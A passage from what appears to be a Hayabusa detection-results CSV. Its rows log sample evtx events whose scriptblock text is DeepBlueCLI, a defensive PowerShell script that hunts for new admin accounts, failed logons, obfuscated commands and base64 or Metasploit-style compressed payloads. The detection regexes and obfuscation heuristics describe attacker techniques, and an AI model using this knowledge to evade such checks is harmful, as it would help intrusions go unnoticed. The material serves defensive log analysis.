$output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } #} } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.Strin",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:49:18.983 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) #if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } #} } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.Strin",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:49:18.983 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:49:18.983 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"g + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:49:18.983 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"g + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:49:18.987 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) #if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } #} } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command 